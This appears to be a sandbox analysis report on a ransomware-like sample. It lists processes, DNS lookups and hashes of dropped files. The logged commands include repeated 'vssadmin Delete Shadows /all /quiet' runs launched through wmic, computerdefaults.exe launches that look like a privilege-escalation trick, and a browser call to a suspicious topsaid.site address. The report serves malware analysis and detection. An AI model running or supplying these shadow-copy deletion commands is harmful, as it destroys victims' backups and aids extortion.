C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://2cc03a300254d290c0diteiyb.topsaid.site/diteiyb&2&55932014&72&273&2219041

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xbc,0x128,0x7ffeaf0546f8,0x7ffeaf054708,0x7ffeaf054718

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2956 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4080 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:1

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3444 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3444 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5256 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5348 /prefetch:1

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2736 /prefetch:1

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1076 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1284 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 2cc03a300254d290c0diteiyb.topsaid.site udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 2cc03a300254d290c0diteiyb.topsaid.site udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 2cc03a300254d290c0diteiyb.topsaid.site udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 2cc03a300254d290c0diteiyb.topsaid.site udp
US 8.8.8.8:53 udp

Files

memory/2196-1-0x000001FA1ED70000-0x000001FA1ED71000-memory.dmp

memory/2196-8-0x000001FA1F0C0000-0x000001FA1F0C1000-memory.dmp

memory/2196-11-0x000001FA1F1B0000-0x000001FA1F1B1000-memory.dmp

memory/2196-10-0x000001FA1F0F0000-0x000001FA1F0F1000-memory.dmp

memory/2196-9-0x000001FA1F0D0000-0x000001FA1F0D1000-memory.dmp

memory/2196-7-0x000001FA1EDD0000-0x000001FA1EDD1000-memory.dmp

memory/2196-6-0x000001FA1EDC0000-0x000001FA1EDC1000-memory.dmp

memory/2196-5-0x000001FA1EDB0000-0x000001FA1EDB1000-memory.dmp

memory/2196-4-0x000001FA1EDA0000-0x000001FA1EDA1000-memory.dmp

memory/2196-3-0x000001FA1ED90000-0x000001FA1ED91000-memory.dmp

memory/2868-12-0x00000193C3230000-0x00000193C3235000-memory.dmp

memory/2196-2-0x000001FA1ED80000-0x000001FA1ED81000-memory.dmp

memory/2196-0-0x000001FA1EE00000-0x000001FA1F091000-memory.dmp

C:\Users\Admin\Pictures\readme.txt

MD5 e56493345d1a19bf98c9a039c9c84a78
SHA1 b75e77b959f8293a51cf4b08b117f19cabbb8125
SHA256 fd397a29aa4c88d195700c983f83b617519931ac3b9088a7b8a550cbb557a129
SHA512 80c5008455079ef1c9ae6e135d69ee11d1858e75f841df3f975bb8b49acb39a4e1d524d78414a3028f39659b1c9019575fcd73a040f8592cced5ad1810c4fd0f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 37f660dd4b6ddf23bc37f5c823d1c33a
SHA1 1c35538aa307a3e09d15519df6ace99674ae428b
SHA256 4e2510a1d5a50a94fe4ce0f74932ab780758a8cbdc6d176a9ce8ab92309f26f8
SHA512 807b8b8dc9109b6f78fc63655450bf12b9a006ff63e8f29ade8899d45fdf4a6c068c5c46a3efbc4232b9e1e35d6494f00ded5cdb3e235c8a25023bfbd823992d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 d7cb450b1315c63b1d5d89d98ba22da5
SHA1 694005cd9e1a4c54e0b83d0598a8a0c089df1556
SHA256 38355fd694faf1223518e40bac1996bdceaf44191214b0a23c4334d5fb07d031
SHA512 df04d4f4b77bae447a940b28aeac345b21b299d8d26e28ecbb3c1c9e9a0e07c551e412d545c7dbb147a92c12bad7ae49ac35af021c34b88e2c6c5f7a0b65f6a8

\??\pipe\LOCAL\crashpad_3800_OABNFMXUMRIAZBCX

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 977be686a2fa95fd58d4b6e3cf0d7884
SHA1 015b35a6efef8e465a95cb40179e3319e71c293d
SHA256 e2b8da784d4db0fbe16761f0b81ef6414e4b84b233b63050e8023f3f86ef8812
SHA512 c996379e893026309127222dcad27261978ae233ca08117d7464cf810045578ce3c87bdd39f976ebb1a6f0a73b617f1fbc7fb8348741ae56ada237e6e5f5aae7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

MD5 8df5844e267d673ef38aae4bc04f3c6c
SHA1 d7f64595b4987c87c225c3a355254a17771ea344
SHA256 a7ec775ec7ff36f06de7d83a2015cb0c717bcfc35f66c689ee4a50a49a0e3f63
SHA512 4acc425a1815746f5196c1ebe05a90b5ab98c14460eed4430da10dc2b868dacd028453a4832df7ffe3e662094184416d3b91ba480f8dfab494850ab3182335f3

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\9b9cdc69c1c24e2b.automaticDestinations-ms

